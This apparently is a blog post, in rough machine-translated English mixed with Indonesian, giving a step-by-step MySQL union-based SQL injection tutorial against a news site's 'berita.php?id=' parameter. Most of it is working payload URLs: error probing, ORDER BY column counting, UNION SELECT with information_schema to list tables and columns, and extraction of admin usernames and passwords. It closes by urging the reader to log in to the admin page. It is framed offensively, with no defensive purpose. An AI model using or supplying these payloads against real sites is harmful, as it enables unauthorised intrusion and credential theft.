My SQL Injection Step by Step

SQL injection is a hacking action performed in the client application by modifying the SQL command that already exists in memory and is clien application techniques that exploit web applications using the database for data storage.

that needs to know before the mysql sql injection:
charakter: ‘ or -
comments: /* or –
information_schema for versi: mysql version 5.x , not support for mysql version 4.x

===========
=Firts step:=
===========

find a target
example: [site]/berita.php?id=100

add Charakter ‘ at the end of url or add charakter “-” to see if there is an error message.
example: [site]/berita.php?id=100′ or
[site]/berita.php?id=-100

so the error message

==========
=Second step:=
==========

find and count the number of tables contained in the database ...
use the command : order by

example: [site]/berita.php?id=-100+order+by+1– or
[site]/berita.php?id=-100+order+by+1/*

check one by one ...
example: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

until error or missing error message…
example: [site]/berita.php?id=-100+order+by+9–

means that we take is until number 8
become [site]/berita.php?id=-100+order+by+8–

===========
=Third step:=
===========

to issue what number appears, use command union
because error until number 9
so: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

suppose that the outcome is number 5

use command version() or @@version to check version of sql that used input command in the numbers out last reply
example: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

see the version used replies, if left alone version 4 for this version of our own 4 column table and figure imaginable on the web because they can not use the command From+Information_schema..

to version 5 then you are lucky not to have to guess n table columns such as version 4 version because in version 5 we can use the command From+Information_schema..

============
=Fourth step:=
============

to display the table thereis on the web is
command: table_name >>> included in the figures out last reply
command: +from+information_schema.tables/* >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

example: table that appears is “admin”

===========
=Fifth step:=
===========

to display all the contents of the table, the command is
command: group_concat(table_name) >>> included in the figures out last reply
command: +from+information_schema.tables+where+table_schema=database() >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= Sixth step: =
=============

command: group_concat(column_name) >>> included in the figures out last reply
command: +from+information_schema.columns+where+table_name=0xhexa– >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

at this stage you are required to take the contents of the table to hexadecimal that is by way of converting your website is used for conversion reply :

www.ascii-convert.co.cc

For example words of compassion in the conversion of the admin will be 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0×61646D696E–

============
=Seventh step:=
============

to make what were formerly excluded from the table that is the way

command: concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> included in the figures out last reply
command: +from+(nama table berasal) >>> included after last number

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi column),6,7,8+from+(nama table berasal)–

examples of words that came out was id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin–

==============
= Eighth step:=
==============

Last step search admin page or login

then up to you because the web of power in your hands

You can leave a response, or trackback from your own site.

0 Response to "My SQL Injection Step by Step"

Post a Comment

Powered by NGELIH